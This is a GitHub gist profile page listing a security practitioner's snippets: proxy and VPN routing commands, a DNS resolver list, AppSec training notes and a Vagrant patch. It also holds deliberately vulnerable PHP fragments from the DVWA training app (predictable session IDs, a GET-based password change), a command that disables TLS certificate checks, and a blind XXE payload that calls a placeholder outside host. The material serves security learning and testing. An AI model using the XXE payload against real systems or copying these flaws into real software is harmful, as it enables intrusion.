Skip to content

Instantly share code, notes, and snippets.

Avatar

Vlad Styran sapran

View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am sapran on github.
  • I am sapran (https://keybase.io/sapran) on keybase.
  • I have a public key ASCg87kjeGdgg5LRWhJaXNpVDoskuE-d1KyB2dmQkfS5EQo

To claim this, I am signing this object:

@sapran
sapran / electron_proxy
Created Jan 31, 2019
Run Electron via proxy
View electron_proxy
NODE_TLS_REJECT_UNAUTHORIZED=0 proxychains4 -f ~/proxychains.conf /Applications/Grammarly.app/Contents/MacOS/Grammarly
View iptables_vpn
ip rule add from $(ip route get 1 | grep -Po '(?<=src )(\S+)') table 128
ip route add table 128 to $(ip route get 1 | grep -Po '(?<=src )(\S+)')/32 dev $(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)')
ip route add table 128 default via $(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)')
View resolvers.txt
1.2.4.8
103.22.248.62
106.186.17.181
109.69.8.34
109.69.8.51
111.223.252.161
114.114.114.114
114.114.114.119
114.114.115.115
114.114.115.119
@sapran
sapran / sample3.php
Last active Apr 6, 2018
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
View sample3.php
<?php
$html = "";
if ($_SERVER['REQUEST_METHOD'] == "POST") {
if (!isset ($_SESSION['last_session_id'])) {
$_SESSION['last_session_id'] = 0;
}
$_SESSION['last_session_id']++;
$cookie_value = $_SESSION['last_session_id'];
@sapran
sapran / sample2.php
Last active Apr 6, 2018
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
View sample2.php
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
@sapran
sapran / appsec_awareness_training_day3.md
Last active Mar 29, 2018
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
View appsec_awareness_training_day3.md
@sapran
sapran / appsec_awareness_training_day2.md
Last active Mar 27, 2018
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
@sapran
sapran / vagrant-patch-for-virtualbox-5.2
Created Mar 25, 2018 — forked from roktas/vagrant-patch-for-virtualbox-5.2
Patch to make vagrant work with VBox 5.2
View vagrant-patch-for-virtualbox-5.2
#!/bin/bash
set -eo pipefail
TARGETFMT='/opt/vagrant/embedded/gems/gems/vagrant-%s/plugins/providers/virtualbox/driver/meta.rb'
die() { echo >&2 "$@"; exit 1; }
[[ $EUID -eq 0 ]] || die "sudo required"
View oob_xxe
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>